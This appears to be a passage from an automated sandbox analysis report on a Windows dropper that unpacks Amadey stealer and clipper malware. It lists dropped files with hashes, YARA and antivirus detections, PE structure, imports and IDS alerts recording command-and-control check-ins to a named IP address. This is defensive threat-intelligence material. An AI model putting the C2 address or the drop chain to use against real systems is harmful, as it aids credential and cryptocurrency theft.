Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\clip64[1].dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	346112
Entropy (8bit):	7.6398500912394285
Encrypted:	false
SSDEEP:	6144:KGy+bnr+up0yN90QETK5opQV2ZCrf5aFld9BY4w8HJuJk:KMrWy90NQwYoPzBc4JuJk
MD5:	E2A785D0666AFD7BBE63FAF32216A8AA
SHA1:	CCE1A094E4CE3F073D2CF9693C20503534D3C4F4
SHA-256:	51380BA1A929713AA9C1BE04FF7BCBB2782E51BA0689B6F86E91BBF41D81811B
SHA-512:	EF9C4F63013AC69B8D9A875B17D9A7FC8EC4DC2E6608390804A83A160D5AF0DD5AAA9AB7638B10EBFE53AA5FDC7BDA346791A2A15F497B2CD486E4224DB93D0D
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 62%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K..K..K...N..K...H..K...O..K...J..K..J...K...C..K.....K...I..K.Rich..K.........PE..L....`.b.................d..........`j............@.................................K.....@...... ......................................................................T...............................@............................................text....c.......d.................. ..`.data...H............h..............@....idata..R............j..............@..@.rsrc................\|..............@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	241664
Entropy (8bit):	6.368190069123744
Encrypted:	false
SSDEEP:	6144:YS/OgTLnk2FBtze+1T9uA/qruVyhVYjgVO:dO3v+uA+uVyhVvO
MD5:	8BB923C4D81284DAEF7896E5682DF6C6
SHA1:	67E34A96B77E44B666C5479F540995BDEACF5DE2
SHA-256:	9B0410052289A8416A458401FBB9A74D6361F4769465431B209F32151D7C6F21
SHA-512:	2DAED03277A343DB5FCB22E26BAEA5CDA41DE39DC825FE0AAD51F6EC181B8F38F09427F27FB58FFD179F37032600D107EF772CC6275F7D0D62899C6CD3F8AFF7
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.M...#...#...#.J. ...#.J.&..#.J.'...#..'...#.. ...#..&.:.#.J."...#..."..#....#.....#.!...#.Rich..#.........PE..L....8.c.............................y............@.......................................@.................................Hm..d................................(...?..p....................@......0@..@............................................text...}........................... ..`.rdata.............................@..@.data....D...........l..............@....rsrc...............................@..@.reloc...(.........................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\aKuf.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	251392
Entropy (8bit):	7.317039374404058
Encrypted:	false
SSDEEP:	6144:Dr0exvHrDLnQ1ik5HXrwCO5vFkb3NUmv30:Dr0ujDLoiYkxvFkDNUmv
MD5:	CCFC1E2539F9382400217DF5AE6D1D8A
SHA1:	A0F83E7D1B3C7C00B387F7963B1E01AF756E7D50
SHA-256:	0D29057FDCACDD5442EC9C8901BDC7C36B69E10B0D8248C8534E0A3A4142C8F5
SHA-512:	35CD1A17BA1FE5A5E934934D6C0FCBEC06D30E5EB584E089E6AF568175B4DD16E6A1CE0B3F2C9C53D36C7867D1D544259050D92D4C036FD40937AB569DAA4D5F
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................B.s.....p.....f..............w...a.....q.....t....Rich...........PE..L......a............................_r............@.................................:.......................................\...P....p..............................@...............................p9..@............................................text............................... ..`.data...............................@....rsrc........p... ..................@..@.reloc...'.......(..................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\bKug.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	11264
Entropy (8bit):	4.97029807367379
Encrypted:	false
SSDEEP:	96:yA/vMth9sDLibql3A44P9QL4fwmPImg+A03PvXLOzk+gqWYV4J6oP/zNt:yw+wGWt94+iANiCkc4Jhp
MD5:	7E93BACBBC33E6652E147E7FE07572A0
SHA1:	421A7167DA01C8DA4DC4D5234CA3DD84E319E762
SHA-256:	850CD190AAEEBCF1505674D97F51756F325E650320EAF76785D954223A9BEE38
SHA-512:	250169D7B6FCEBFF400BE89EDAE8340F14130CED70C340BA9DA9F225F62B52B35F6645BFB510962EFB866F988688CB42392561D3E6B72194BC89D310EA43AA91
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.."...........@... ...`....@.. ....................................@..................................@..O....`...............................@..8............................................ ............... ..H............text.... ... ...".................. ..`.rsrc........`.......$..............@..@.reloc.............................@..B.................@......H.......T$...............................................................0...........@s.....@...(....&..0..K......... ?...(......~....(....,.r...p.....(....%..(....& ....(....(....&.(....&..0..e.......(....~........+G.....o....r#..p(....,-.o.... ......(....-..(....&(.....o....(....&..X....i2..(....&....0..`.......(....~........+B.....o....r...p(....,(.o.... ......(....-..(....&.o....(....&..X....i2..(....&.0..c......... ?...(......~....(....,.*....(............%...(...

C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91136
Entropy (8bit):	6.3469756750979025
Encrypted:	false
SSDEEP:	1536:Fto4NPCKLbqoYkbpplW9YoUsxXzbcouNhj2ZszsWuKcdJU7dz5QIaB89p:roUCWbBNpplToUs1uNhj25LJUDaB89p
MD5:	C79B74D8FEC5E7E2BA2F1789FD582A15
SHA1:	78A1E5D99DBACCC5E07B125E1DFB280112CB3128
SHA-256:	B5BD049D32F0FAEEA6CE65A0F0D326DE5BC4427A7C1AD24BFB0EA050C1DEC7D3
SHA-512:	0DEBFC54904FD538CFB1FC648D18F90A991337200B3DECF74B28AC2F341843FB3BAB4F45BC92CFEC333B18DFFF9CC136854462E79054A39926A7BD8EE2E057BA
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Roaming\c1ec479e5342a2\clip64.dll, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 81%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........,Cy..Cy..Cy.....~Iy.....~.y.....~Qy.....~Ly.....~Ry.....~by.....~Fy..Cy...y.....~@y.....~By......By.....~By..RichCy..........PE..L....8.c...........!.................>....................................................@..........................J......<K..<...............................T... ?..p............................?..@...............,............................text...V........................... ..`.rdata...a.......b..................@..@.data...D....`.......D..............@....rsrc................P..............@..@.reloc..T............R..............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\c1ec479e5342a2\cred64.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	162
Entropy (8bit):	4.621829903792328
Encrypted:	false
SSDEEP:	3:qVoB3tURObOb0qHXboAcMBXqWrKb0GklIVLLPROZ/eIwcWWGu:q43tIkObRHXiMIWObtklI5LPROeIpfGu
MD5:	1B7C22A214949975556626D7217E9A39
SHA1:	D01C97E2944166ED23E47E4A62FF471AB8FA031F
SHA-256:	340C8464C2007CE3F80682E15DFAFA4180B641D53C14201B929906B7B0284D87
SHA-512:	BA64847CF1D4157D50ABE4F4A1E5C1996FE387C5808E2F758C7FB3213BFEFE1F3712D343F0C30A16819749840954654A70611D2250FD0F7B032429DB7AFD2CC5
Malicious:	false
Preview:	<html>..<head><title>404 Not Found</title></head>..<body>..<center><h1>404 Not Found</h1></center>..<hr><center>nginx/1.18.0 (Ubuntu)</center>..</body>..</html>..

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\cacls.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	15
Entropy (8bit):	3.240223928941852
Encrypted:	false
SSDEEP:	3:o3F:o1
MD5:	509B054634B6DE74F111C3E646BC80FD
SHA1:	99B4C0F39144A92FE42E22473A2A2552FB16BD13
SHA-256:	07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
SHA-512:	A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
Malicious:	false
Preview:	processed dir:

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.809742458927501
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	537600
MD5:	b16d53f153404f5825765f11ab2b6827
SHA1:	cc5d6001624f836f5aa82e0178c6c2dc2fdac2c4
SHA256:	128da440dc3448874960fb1eb8d34c283ba78f6517e20b57f2faa158d84a3fd0
SHA512:	775b43cadf18aaa5319faded84739c974580d075edf96ab38156fdb2431f6d339bc6d85871e3ca574b30be22eac0c74804e3eb55654356835491577d635776b9
SSDEEP:	12288:ZMrVy90wNpxJPhsvwmGAPzBU4NuJ+AlVH3Md1v:YyxNpxJ2LbBNNuJ+uVH30J
TLSH:	E7B4024BE7EC8032D9B117B059F202C31536BE905B38939B229EAC5F58736A4E53177B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007FB39CC17105h
jmp 00007FB39CC16A15h
push 00000058h
push 004072B8h
call 00007FB39CC171A7h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FB39CC16A2Ah
cmp eax, esi
jne 00007FB39CC16A19h
xor esi, esi
inc esi
mov edi, esi
jmp 00007FB39CC16A22h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007FB39CC169E9h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007FB39CC16A1Ch
push 0000001Fh
call 00007FB39CC16F3Bh
pop ecx
jmp 00007FB39CC16A4Ch
cmp dword ptr [004088B0h], ebx
jne 00007FB39CC16A3Eh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007FB39CC16B66h
pop ecx
pop ecx
test eax, eax
je 00007FB39CC16A29h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FB39CC16B49h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007FB39CC16A2Dh
push 004010B4h
push 004010ACh
call 00007FB39CC170F5h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x7ad9c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x87000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x7b000	0x7ae00	False	0.9247679298067142	data	7.854212666782187	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x87000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x24740	0x2f2	data	English	United States
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia
RT_DIALOG	0x24d90	0x1b0	data	English	United States
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia
RT_DIALOG	0x250f4	0x166	data	English	United States
RT_DIALOG	0x2525c	0x168	data	Russian	Russia
RT_DIALOG	0x253c4	0x1c0	data	English	United States
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia
RT_DIALOG	0x25764	0x130	data	English	United States
RT_DIALOG	0x25894	0x150	data	Russian	Russia
RT_DIALOG	0x259e4	0x120	data	English	United States
RT_DIALOG	0x25b04	0x122	data	Russian	Russia
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia
RT_STRING	0x25d3c	0x520	data	English	United States
RT_STRING	0x2625c	0x52e	data	Russian	Russia
RT_STRING	0x2678c	0x5cc	data	English	United States
RT_STRING	0x26d58	0x592	data	Russian	Russia
RT_STRING	0x272ec	0x4b0	data	English	United States
RT_STRING	0x2779c	0x4b2	data	Russian	Russia
RT_STRING	0x27c50	0x44a	data	English	United States
RT_STRING	0x2809c	0x43e	data	Russian	Russia
RT_STRING	0x284dc	0x3ce	data	English	United States
RT_STRING	0x288ac	0x2fc	data	Russian	Russia
RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x28bb0	0x5d0be	Microsoft Cabinet archive data, many, 381118 bytes, 2 files, at 0x2c +A "bKug.exe" +A "xriv.exe", ID 1586, number 1, 18 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0x85c70	0x4	data	English	United States
RT_RCDATA	0x85c74	0x24	data	English	United States
RT_RCDATA	0x85c98	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85ca0	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85ca8	0x4	data	English	United States
RT_RCDATA	0x85cac	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85cb8	0x4	data	English	United States
RT_RCDATA	0x85cbc	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85cc8	0x4	data	English	United States
RT_RCDATA	0x85ccc	0x6	data	English	United States
RT_RCDATA	0x85cd4	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85cdc	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x85ce4	0xbc	data	English	United States
RT_VERSION	0x85da0	0x408	data	English	United States
RT_VERSION	0x861a8	0x410	data	Russian	Russia
RT_MANIFEST	0x865b8	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.562.204.41.449780802027700 02/07/23-19:57:25.243032	TCP	2027700	ET TROJAN Amadey CnC Check-In	49780	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450240802027700 02/07/23-19:59:33.419821	TCP	2027700	ET TROJAN Amadey CnC Check-In	50240	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449814802027700 02/07/23-19:57:35.140362	TCP	2027700	ET TROJAN Amadey CnC Check-In	49814	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449912802027700 02/07/23-19:58:02.026161	TCP	2027700	ET TROJAN Amadey CnC Check-In	49912	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449909802027700 02/07/23-19:58:01.309254	TCP	2027700	ET TROJAN Amadey CnC Check-In	49909	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450237802027700 02/07/23-19:59:32.701921	TCP	2027700	ET TROJAN Amadey CnC Check-In	50237	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450433802027700 02/07/23-20:00:26.461663	TCP	2027700	ET TROJAN Amadey CnC Check-In	50433	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450139802027700 02/07/23-19:59:06.422233	TCP	2027700	ET TROJAN Amadey CnC Check-In	50139	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450209802027700 02/07/23-19:59:25.926205	TCP	2027700	ET TROJAN Amadey CnC Check-In	50209	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450335802027700 02/07/23-19:59:58.469497	TCP	2027700	ET TROJAN Amadey CnC Check-In	50335	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450175802027700 02/07/23-19:59:15.074931	TCP	2027700	ET TROJAN Amadey CnC Check-In	50175	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450307802027700 02/07/23-19:59:51.711604	TCP	2027700	ET TROJAN Amadey CnC Check-In	50307	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449847802027700 02/07/23-19:57:43.302254	TCP	2027700	ET TROJAN Amadey CnC Check-In	49847	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449749802027700 02/07/23-19:57:17.867893	TCP	2027700	ET TROJAN Amadey CnC Check-In	49749	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450466802027700 02/07/23-20:00:34.175411	TCP	2027700	ET TROJAN Amadey CnC Check-In	50466	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450016802027700 02/07/23-19:58:31.545050	TCP	2027700	ET TROJAN Amadey CnC Check-In	50016	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450114802027700 02/07/23-19:58:57.604605	TCP	2027700	ET TROJAN Amadey CnC Check-In	50114	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450212802027700 02/07/23-19:59:26.656555	TCP	2027700	ET TROJAN Amadey CnC Check-In	50212	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450368802027700 02/07/23-20:00:08.721533	TCP	2027700	ET TROJAN Amadey CnC Check-In	50368	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450273802027700 02/07/23-19:59:41.686869	TCP	2027700	ET TROJAN Amadey CnC Check-In	50273	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450371802027700 02/07/23-20:00:09.426162	TCP	2027700	ET TROJAN Amadey CnC Check-In	50371	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450077802027700 02/07/23-19:58:48.624595	TCP	2027700	ET TROJAN Amadey CnC Check-In	50077	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450170802027700 02/07/23-19:59:13.888323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50170	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450310802027700 02/07/23-19:59:52.435304	TCP	2027700	ET TROJAN Amadey CnC Check-In	50310	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449945802027700 02/07/23-19:58:12.060541	TCP	2027700	ET TROJAN Amadey CnC Check-In	49945	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450458802027700 02/07/23-20:00:32.245201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50458	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449839802027700 02/07/23-19:57:41.005570	TCP	2027700	ET TROJAN Amadey CnC Check-In	49839	80	192.168.2.5	62.204.41.4
